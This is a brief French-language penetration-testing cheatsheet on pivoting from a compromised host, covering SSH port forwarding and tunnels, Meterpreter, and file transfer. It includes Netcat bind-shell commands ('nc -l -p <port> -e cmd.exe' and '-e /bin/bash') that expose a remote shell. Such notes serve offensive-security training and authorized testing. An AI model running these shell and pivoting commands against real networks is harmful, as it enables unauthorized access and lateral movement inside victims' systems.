Pivotage
Pivotage - Cheatsheet
Prérequis :
Avoir compromis un système sur le réseau cible (par exemple, un serveur ou un poste de travail).
Disposer de privilèges suffisants sur le système compromis pour effectuer des actions supplémentaires.
Utilisation de SSH pour le pivotage (port forwarding) :
ssh -L <port_local>:<adresse_destination>:<port_destination> <utilisateur>@<hôte>
: Transfert de port local vers le système distant.
Utilisation de Netcat pour le pivotage :
Sur la machine compromise :
nc -l -p <port_local> -e cmd.exe
(Windows)nc -l -p <port_local> -e /bin/bash
(Linux) : Attendre les connexions sur le port local.Sur la machine d'attaque :
nc <hôte_compromis> <port_local>
: Se connecter au port local pour accéder au système distant.
Utilisation de Meterpreter pour le pivotage (Metasploit) :
Sur la machine compromise : Utilisez un payload Meterpreter adapté aux privilèges et au système cible (Windows/Linux).
Utilisez les commandes Meterpreter pour établir des connexions aux autres machines internes depuis le système compromis.
Utilisation de tunnels pour le pivotage :
ssh -L <port_local>:<adresse_interne>:<port_interne> <utilisateur>@<hôte_intermédiaire>
: Créer un tunnel SSH vers un hôte intermédiaire, puis vers un hôte interne.
Transfert de fichiers entre systèmes internes :
Utilisez des commandes telles que scp ou netcat pour transférer des fichiers entre les systèmes internes accessibles depuis la machine compromise.
Last updated